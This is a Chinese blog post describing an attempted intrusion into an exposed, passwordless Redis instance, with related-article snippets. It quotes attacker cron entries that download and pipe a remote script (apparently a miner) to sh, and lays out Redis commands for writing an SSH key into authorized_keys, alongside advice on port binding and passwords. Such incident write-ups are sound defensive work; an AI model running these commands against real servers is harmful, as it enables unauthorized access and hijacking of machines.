Redis 也能被攻击?一次Redis被入侵的记录

最新推荐文章于 2025-03-27 10:43:01 发布
最新推荐文章于 2025-03-27 10:43:01 发布
阅读量5.7k 收藏 6
点赞数 4
分类专栏: 攻击记录 文章标签: redis 数据库 网络安全
本文链接:https://blog.csdn.net/java_1996/article/details/121728057
版权
本文揭露了一次通过RDB方式入侵Redis服务器的案例,攻击者试图通过下载并执行恶意脚本,利用定时任务可能造成的风险。文章强调了docker端口绑定、Redis密码设置及安全实践的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

通过 RDB 方式入侵,Redis 被攻击记录

1. 详情

发现 Redis 中突然多了几个 key

  • backup1
  • backup2
  • backup3
  • backup4

具体内容如下:

*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh

*/3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh


*/4 * * * * root curl -fsSL http://45.133.203.192/cleanfda/init.sh | sh

*/5 * * * * root wd1 -q -O- http://45.133.203.192/cleanfda/init.sh | sh

看起来都是去下载sh脚本的。

然后看了下 Redis 日志,一直再报错:

 Failed opening the RDB file crontab (in server root dir /etc) for saving: Permission denied

大概是RDB的时候,保存时因为没有权限报错了。

然后看了下RDB相关配置:

spider:0>config get dir
 1)  "dir"
 2)  "/etc"
spider:0>config get dbfilename
 1)  "dbfilename"
 2)  "crontab"

好家伙,果然被改了,给改成了/etc/crontab。这不就是定时任务吗

然后再结合上多出来的几个 key 的内容,妥妥的被攻击了。

这RDB如果执行成功了,然后定时任务就算是被添加了,最终把脚本下载下来并执行,妥妥的矿机一个了。

好在是这个 Redis 是用 docker 跑的,权限问题,没有被得手。

因为是测试服务器,随便用 Docker 起了一个,也没设置密码,端口和IP绑定也没改,就差点中招。

被入侵成功的案例:

https://www.codenong.com/txiaoxiaoher-2511379/

网上找了下,还有通过 设置主从同步 的方式被入侵的 redis 的案例:

https://www.renfei.net/posts/1003500

2. 后记

其实本次最大的漏洞是在 docker 运行绑定端口的时候,绑定是的 0.0.0.0:6379。正确的应该绑定 127.0.0.1:6379。

首先,docker 在绑定端口的时候直接修改了防火墙,如果不指定IP,那么默认是 0.0.0.0:6379,docker 设置防火墙开放 0.0.0.0:6379,任何 IP 都可以访问 6379。但你如果设置 127.0.0.1:6379,那只有本机地址能访问 6379。所以造成了端口向外暴露。docker 会接管防火墙!

防火墙相关文档 https://www.cnblogs.com/qjfoidnh/p/11567309.html

其次,因为原本设计的 redis 是内部使用,并不对外公开,也就没有密码,直接裸奔,也造成了端口暴露以后在全互联网裸奔的情况。

最后,redis 是可以将内容保存到本地磁盘中的,这就造成了通过 redis 间接可以写入文件,例如:

redis 执行以下命令,将 ssh key 写入被害机器,注意首尾要加换行符

set jjj "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABA....\n\n"
config set dir /root/.ssh
config set dbfilename authorized_keys
save

此时就将 ssh key 写入了 /root/.ssh/authorized_keys,就实现了免密登陆,黑客可以直接 ssh 进来了。同理还可以写入定时任务文件,让被害机器执行黑客的脚本。

解决方案

  • 1)docker 开放端口的时候一定要指定 IP 地址
  • 2)给 redis 增加密码验证

江湖凶险,即使是个测试服务器也不能掉以轻心

Redis攻击纪实
程序员青菜学厨记
11-08 569
1、2017年时候测试环境安装的是Redis4.0版本(或者更低,记不太清了),默认安装6379端口可以远程访问,然后被黑了,被人家做为挖矿机,他们太狠了,一定要把我CPU耗尽,搞得别的程序都跑不了(这样别人不就发现了吗,不能控制CPU的占用情况吗?上周新来的同事分享Redis的原理和机制,想起2017年的时候测试环境Redis攻击,最后只能重新安装服务器,今天试验一把利用Redis漏洞进行攻击,只有理解了别人是怎么攻击的,才能更好地进行防范。注:忘记截屏了,重启了Redis,那个注入的key找不到了。
一次愚蠢的Redis配置导致Linux服务器被恶意攻击
u012708900的博客
12-23 915
起因 之前Linux服务器上面一直启的Redis单机,并设置了密码。也没出现过问题。对安全这方面也不太敏感。 前天重新搭建了Redis集群(一主两从三哨兵),都只是做了最简单的配置,期初master配置中是有密码的,但是在配置slave时,没有添加masterauth配置项(因为无知,- -!),导致主从复制一直失败,索性就把master中的requirepass给注释掉了。再次重启主从复制成功了,哨兵的配置也成功启动,发现模拟故障转移也莫得问题,就认为万事大吉了。 经过 然而昨天中午的时候,收到了阿里云的
记录一次云服务器redis被黑
m0_73520938的博客
04-24 770
redis里莫名奇妙被写入四个键值对,backup1,backup2,backup3,backup4,内容是奇奇怪怪的sh脚本:*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh。施展百度大法后发现原来被挖矿了.....(redis明明设置了密码.....)解决办法:设置更复杂的redis连接密码,安全组,防火墙。
redis受到黑客攻击
最新发布
weixin_67725462的博客
03-27 169
我在阿里云上购买的服务器上安装了redis,我把redis设置成bind 0.0.0.0 ,端口是6379。结果第二天发现我的filebeat无法向redis写入数据,显示我的redis是副本只能进行读取数据。不个这个slave是临时设置的,只要重启redis就不会是redis slave。然后看了一下发现我的redis在向一个不知道的主机同步数据。redis里面还有我不认识的数据。
redis被黑客入侵
程序员陆通
02-12 1530
[root@iZ112fail84Z home]# redis-cli 127.0.0.1:6379> keys * 1) “crackit” 127.0.0.1:6379> get crackit “\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n”这个程序每5分钟执行一个shell
redis受到攻击
weixin_40083227的博客
05-03 511
今天被挖矿软件不小心植入脚本了,导致云服务器100%的CPU占用,被迫当肉鸡。原因是redis的默认端口没有改,也没有密码,就被攻击。 解决方法是 sudo kill -9 10053 && sudo userdel redis 必须要同时执行,这个脚本会自动唤醒,删除redis用户后,找到异常的脚本文件删除掉。然后卸载redis,sudo apt remove redis ...
云服务器上Redis数据库攻击实录+总结
青衫客36的博客
05-15 1834
通过以上步骤,可以详细了解攻击过程,并采取有效的措施防止类似攻击的发生。增强 Redis 服务器和系统的安全性是关键,确保只有受信任的用户能够访问和管理服务器。计划任务格式:计划任务的格式是一个定时器表达式后跟执行命令。这条任务每 15 分钟执行一次curl命令下载并执行远程脚本。文件路径:攻击者将 Redis 配置为将数据持久化到cron计划任务目录,如。这导致持久化的内容成为cron守护进程的一部分计划任务。持久化机制的滥用:通过 Redis 的SAVE。
redis漏洞被攻击
dwdqsa的博客
03-05 630
redis在无密码 且无bind情况下 黑客可以拿到root凌晨四点 服务器被攻击 之后服务器内存一直被udevs占满,疑似挖矿进程,删除会自动恢复去掉执行权限 chmod -x 后 杀掉进程 服务器正常...
记录一下五天前的晚上阿里云服务器redis入侵的经历
weixin_43938739的博客
05-17 911
我是个普通大二学生,最近做项目需要部署到服务器上,于是我月初在阿里云买了个小服务器,安装好jdk,tomcat,mysql,redis就没管了,第一次弄服务器,没什么经验,当时漏洞我没管,打算有空再搞.redis密码也没设置(太蠢了),端口还是默认的6379对外网开放. 就这么相安无事过了7天吧,那天晚上还在打游戏,看到阿里云发来的短信心头一紧,马上上去看,被入侵了,查了一会,发现是挖矿木马,就是如下这种 https://zhuanlan.zhihu.com/p/54610161 我上来就登录redis f
redis防止黑客恶意攻击的简单办法
qq_36779138的博客
12-31 1533
1.在redis中放入有用户标识的key,每次用户操作时都会根据用户标识的key去匹配一下,匹配上就能操作,匹配不上就拒绝。 下面的代码是商品秒杀场景,根据用户id和商品id去生成一个标识,然后放入redis缓存中。 @Override public String getMd5(Integer id,Integer userid){ //检验用户的合法性 User user = userMapper.findById(userid); if(user
一次Redis漏洞导致服务器被入侵以及解决的过程
orisonchan的博客
08-09 2733
其实这个问题在网上都有说明。然而因为本人是开发出身,运维方面比较欠缺,所以才会遇到此问题,遂记录下来,以此为戒。 被入侵现象 服务器多了很多莫名其妙的操作,根据查看操作记录命令history得到。 服务器会莫名其妙重启。 经常ssh免密登录失效。 apt-get使用报错。 报错log如下: insserv: warning: script 'S01w...
Redis的初步搭建及被入侵经历
dobat的博客
05-31 3943
越来越觉得Redis的火热,同时日常开发中迫切需要用到,所以赶紧来充充电吧。网上非常详细的介绍了Redis的来源、特点、数据结构、应用场景等。在这里仅以一个新接触的入门者来自我总结下,Redis可以理解为以内存作为数据存储介质,因此读写效率极高,相比较于传统的关系数据库,如Mysql,非常适合存储读取频繁使用的数据。同时实现了持久化,不用担心数据丢失,支持多种数据结构,主从模式、配置集群什么的当然...
Centos上由于redis漏洞被攻击
半僧
12-06 1807
早上一直收到腾讯云报警,查看了下: 有个yam程序,占用大量CPU!!! 真他娘的纳闷,我服务器跑了什么我还不清楚?于是乎开始查哪来的? 于是我去百度了下 jyam -c x -M stratum+tcp 果不其然确实有这样的攻击,网上说这个攻击是由于redis未授权登陆漏洞引 起导致黑客利用的结果我去redis 控制台登录一看固然有个莫名其妙的key 刚好这个key 就是ssh的
一次Redis攻击事件
Dxx_23的博客
04-02 1290
redis版本为:7.2.4。
Redis服务入侵
一枚小白的分享,不喜勿喷~
08-22 1006
百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis因配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等。
[网络安全-1]Redis远程攻击漏洞分析与防护
shgh_2004的专栏
05-31 945
Redis远程攻击漏洞分析与防护 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥...
Redis收到攻击怎么办
qq_45732538的博客
01-27 253
Redis防护建议(请您根据主机实际业务衡量进行防护) 1、Redis本身防护 (1)不要使用默认端口(6379) (2)增加Redis用户名和密码 (3)在Redis绑定指定IP访问(位置配置文件[redis.config]中的bind节点) 2、Linux服务器 (1)Redis服务器不要暴露在外网 (2)开启防火墙,限制IP可以访问(iptables命令) (3)用容器(如Docker等)管理起服务器,这样中病毒后排查不出原因需要重新装环境的时候影响小并且可以快速恢复 ...
血的教训---入侵redis并远程控制你的机器场景复现
guijianchouxyz的博客
10-26 7142
不怕服务安装部署,就怕上任运维瞎部署防不胜防,全是泪,全是血
关于2022年10月12日发现服务器Redis攻击报告
weixin_44547333的博客
10-13 646
记录一次自己的服务器redis攻击,以及排查过程和解决
redis unacc
02-28
### Redis 未授权访问解决方案 为了防止 Redis 实例遭受未经授权的访问,采取适当的安全措施至关重要。以下是几种有效的防护方法: #### 配置密码认证 启用 Redis 认证功能可以有效阻止未授权用户的访问。通过设置 `requirepass` 参数来配置连接所需的密码。 ```bash requirepass your_strong_password ``` 这使得客户端在执行任何命令前必须先发送 AUTH 命令并提供正确的密码[^1]。 #### 绑定本地地址 确保 Redis 只监听来自可信网络接口的数据包,默认情况下应绑定到 localhost 或者特定内网 IP 地址上运行,而不是开放给所有外部请求。 ```bash bind 127.0.0.1 ``` 此操作减少了暴露于公共互联网的风险,从而降低了被攻击的可能性。 #### 修改默认端口 更改 Redis 默认使用的 TCP 端口号 (通常是6379),虽然这不是主要安全手段,但可以帮助减少自动化扫描工具发现服务的机会。 ```bash port 8379 ``` 这种做法增加了潜在入侵者的难度,因为他们需要猜测实际使用的端口编号。 #### 启用防火墙规则 利用操作系统自带的防火墙设施(如 iptables),仅允许指定源IP范围内的主机向 Redis 发起连接尝试,进一步缩小受信任设备列表。 ```bash iptables -A INPUT -p tcp --dport 8379 -s 192.168.1.0/24 -j ACCEPT iptables -A INPUT -p tcp --dport 8379 -j DROP ``` 上述指令表示接受来自192.168.1.x子网内部发起的所有入站TCP流量指向自定义后的Redis端口(这里假设为8379),而拒绝其他一切外来链接请求。 #### 定期更新与监控 保持软件版本处于最新状态,并定期审查日志文件中的异常活动记录;对于生产环境而言尤为重要的是部署专业的安全审计工具来进行实时监测预警。 ---
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值